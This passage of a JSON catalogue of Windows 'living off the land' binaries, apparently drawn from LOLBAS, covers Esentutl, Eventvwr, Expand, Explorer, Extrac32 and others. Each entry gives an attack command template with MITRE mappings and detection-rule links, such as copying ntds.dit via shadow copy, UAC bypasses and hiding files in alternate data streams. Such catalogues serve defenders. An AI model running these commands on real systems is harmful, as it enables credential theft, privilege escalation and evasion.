file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:1","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o","description":"Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.","usecase":"Copy file and hide it in an alternate data stream as a defensive counter measure","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:2","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o","description":"Copies the source Alternate Data Stream (ADS) to the destination EXE.","usecase":"Extract hidden file within alternate data streams","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:3","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o","description":"Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.","usecase":"Copy file and hide it in an alternate data stream as a defensive counter measure","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:4","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o","description":"Copies the source EXE to the destination EXE file","usecase":"Use to copy files from one unc path to another","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:5","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d {PATH_ABSOLUTE:.dit}","description":"Copies a (locked) file using Volume Shadow Copy","usecase":"Copy/extract a locked file such as the AD Database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:eudcedit-exe:0","toolId":"lolbas:eudcedit-exe","toolName":"Eudcedit.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"eudcedit","description":"Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option \"Link with Selected Fonts\" and click on Save As, then in the opened enter the command you want to execute.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"admin","fullPath":["c:\\windows\\system32\\eudcedit.exe","c:\\windows\\syswow64\\eudcedit.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Processes spawned by eudcedit.exe."}],"references":["https://medium.com/@matanb707/windows-fonts-exploitation-in-2025-bypassing-uac-with-eudcedit-915599705639","https://lolbas-project.github.io/lolbas/Binaries/Eudcedit/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:eventvwr-exe:0","toolId":"lolbas:eventvwr-exe","toolName":"Eventvwr.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"eventvwr.exe","description":"During startup, eventvwr.exe checks the registry value `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml"},{"type":"IOC","value":"eventvwr.exe launching child process other than mmc.exe"},{"type":"IOC","value":"Creation or modification of the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"}],"references":["https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/","https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1","https://twitter.com/orange_8361/status/1518970259868626944","https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:eventvwr-exe:1","toolId":"lolbas:eventvwr-exe","toolName":"Eventvwr.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c \"{CMD}\" > RecentViews & copy RecentViews %LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews & eventvwr.exe","description":"During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net","usecase":"Execute a command to bypass security restrictions that limit the use of command-line interpreters.","mitre":["T1548.002"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml"},{"type":"IOC","value":"eventvwr.exe launching child process other than mmc.exe"},{"type":"IOC","value":"Creation or modification of the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"}],"references":["https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/","https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1","https://twitter.com/orange_8361/status/1518970259868626944","https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:expand-exe:0","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat}","description":"Copies source file to destination.","usecase":"Use to copies the source file to the destination file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:expand-exe:1","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext}","description":"Copies source file to destination.","usecase":"Copies files from A to B","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:expand-exe:2","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat","description":"Copies source file to destination Alternate Data Stream (ADS)","usecase":"Copies files from A to B","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:explorer-exe:0","toolId":"lolbas:explorer-exe","toolName":"Explorer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"explorer.exe /root,\"{PATH_ABSOLUTE:.exe}\"","description":"Execute specified .exe with the parent process spawning from a new instance of explorer.exe","usecase":"Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml"},{"type":"IOC","value":"Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious."}],"references":["https://twitter.com/CyberRaiju/status/1273597319322058752?s=20","https://twitter.com/bohops/status/1276356245541335048","https://twitter.com/bohops/status/986984122563391488","https://lolbas-project.github.io/lolbas/Binaries/Explorer/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:explorer-exe:1","toolId":"lolbas:explorer-exe","toolName":"Explorer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"explorer.exe {PATH_ABSOLUTE:.exe}","description":"Execute notepad.exe with the parent process spawning from a new instance of explorer.exe","usecase":"Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml"},{"type":"IOC","value":"Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious."}],"references":["https://twitter.com/CyberRaiju/status/1273597319322058752?s=20","https://twitter.com/bohops/status/1276356245541335048","https://twitter.com/bohops/status/986984122563391488","https://lolbas-project.github.io/lolbas/Binaries/Explorer/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:extexport-exe:0","toolId":"lolbas:extexport-exe","toolName":"Extexport.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Extexport.exe {PATH_ABSOLUTE:folder} foo bar","description":"Load a DLL located in the specified folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll.","usecase":"Execute dll file","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Internet Explorer\\Extexport.exe","C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml"},{"type":"IOC","value":"Extexport.exe loads dll and is execute from other folder the original path"}],"references":["http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Extexport/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:extrac32-exe:0","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe","description":"Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.","usecase":"Extract data from cab file and hide it in an alternate data stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:extrac32-exe:1","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe","description":"Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.","usecase":"Extract data from cab file and hide it in an alternate data stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:extrac32-exe:2","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE}","description":"Copy the source file to the destination file and overwrite it.","usecase":"Download file from UNC/WEBDav","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:extrac32-exe:3","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe}","description":"Command for copying file from one folder to another","usecase":"Copy file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 